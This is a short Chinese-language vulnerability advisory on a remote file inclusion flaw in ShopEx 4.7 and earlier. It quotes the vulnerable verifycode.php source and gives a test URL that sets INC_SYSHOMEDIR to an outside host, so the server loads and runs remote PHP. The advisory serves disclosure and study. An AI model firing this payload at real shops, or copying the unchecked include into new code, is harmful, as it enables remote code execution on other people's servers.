ShopEx <= 4.7 verifycode.php 远程包含漏洞

影响版本:

ShopEx <= 4.7

漏洞描述:

verifycode.php 

<?php  
/**  
*   
* 登陆验证码生成文件  
* 
* @package ShopEx网上商店系统  
* @version 4.6  
* @author ShopEx.cn <>  
* @url   
* @since PHP 4.3  
* @copyright ShopEx.cn  
*  
**/ if (!defined("ISSHOP"))
  {  Header("Location:../index.php");
  exit;
  }
  /* 调用 session 文件 */ include_once($INC_SYSHOMEDIR."include/session.inc.php");    mt_srand((double)microtime() * 1000000);
  /* 生成验证码 */
 $strValidate = mt_rand(1000, 9999);
  session_unregister("RANDOM_CODE");
  session_register("RANDOM_CODE");
  $_SESSION["RANDOM_CODE"] = $strValidate."";
  $verifyImg = newclass("verifyCode", $strValidate);
    /* 输出验证码图片 */
 $verifyImg->Output();
  ?>

<*参考

http://www.0xss.cn/read.php/530.htm

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

shop/verifycode.php?INC_SYSHOMEDIR=http://www.0xss.cn/xx.txt?

ZeroBox Vulnerability Database

坚持！我们将做的更好！

ShopEx <= 4.7 verifycode.php 远程包含漏洞

0 条评论。

发表评论